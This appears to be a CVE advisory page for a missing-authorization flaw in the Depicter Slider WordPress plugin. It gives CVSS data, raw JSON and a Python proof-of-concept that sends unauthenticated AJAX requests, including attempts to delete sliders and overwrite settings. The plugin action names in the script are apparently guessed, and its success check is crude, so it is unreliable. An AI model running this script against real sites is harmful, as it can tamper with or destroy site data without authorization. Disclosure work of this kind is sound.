Security Vulnerability Report
中文
CVE-2025-68558 CVSS 6.5 MEDIUM

CVE-2025-68558

Published: 2026-01-22 17:16:11
Last Modified: 2026-04-27 19:16:31

Description

Missing Authorization vulnerability in averta Depicter Slider depicter allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Depicter Slider: from n/a through <= 4.0.4.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Depicter Slider <= 4.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68558 PoC - Depicter Slider Broken Access Control # This PoC demonstrates the missing authorization vulnerability in Depicter Slider <= 4.0.4 import requests import sys # Target WordPress site with vulnerable Depicter Slider plugin TARGET_URL = "http://target-wordpress-site.com" # Common Depicter AJAX endpoints that may lack authorization checks ENDPOINTS = [ "/wp-admin/admin-ajax.php", "/wp-json/depicter/v1/", ] def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-68558 Attempts to access protected plugin functions without authentication """ print(f"[*] Testing {TARGET_URL} for CVE-2025-68558") print(f"[*] Target: Depicter Slider <= 4.0.4\n") # Test various plugin actions without authentication test_actions = [ { "action": "depicter_get_all_sliders", "description": "Attempt to retrieve all slider configurations" }, { "action": "depicter_export_data", "description": "Attempt to export slider data" }, { "action": "depicter_delete_slider", "params": {"id": 1}, "description": "Attempt to delete a slider" }, { "action": "depicter_save_settings", "params": {"settings": {}}, "description": "Attempt to modify plugin settings" } ] vulnerable_endpoints = [] for endpoint in ENDPOINTS: url = f"{TARGET_URL}{endpoint}" print(f"[+] Testing endpoint: {url}") for test in test_actions: try: data = {"action": test["action"]} if "params" in test: data.update(test["params"]) # Send unauthenticated request response = requests.post(url, data=data, timeout=10) # Check if request was successful (indicating missing auth check) if response.status_code == 200: # Check response content for signs of successful unauthorized access if any(indicator in response.text.lower() for indicator in ["success", "data", "slider", "[]", "true"]): print(f" [!] VULNERABLE: {test['description']}") print(f" Action: {test['action']}") vulnerable_endpoints.append({ "endpoint": endpoint, "action": test["action"], "description": test["description"] }) break except requests.RequestException as e: print(f" [-] Error testing {test['action']}: {e}") return vulnerable_endpoints def main(): if len(sys.argv) > 1: global TARGET_URL TARGET_URL = sys.argv[1] results = check_vulnerability() if results: print(f"\n[!] VULNERABILITY CONFIRMED!") print(f"[!] Found {len(results)} vulnerable endpoint(s)") print("\n[*] Recommended actions:") print(" 1. Update Depicter Slider to latest version") print(" 2. Disable plugin if update not available") print(" 3. Implement web application firewall rules") else: print("\n[*] No obvious vulnerability detected (may require manual testing)") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68558", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:11.007", "lastModified": "2026-04-27T19:16:30.617", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in averta Depicter Slider depicter allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Depicter Slider: from n/a through <= 4.0.4."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en averta Depicter Slider depicter permite explotar Niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Depicter Slider: desde n/a hasta &lt;= 4.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/depicter/vulnerability/wordpress-depicter-slider-plugin-4-0-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}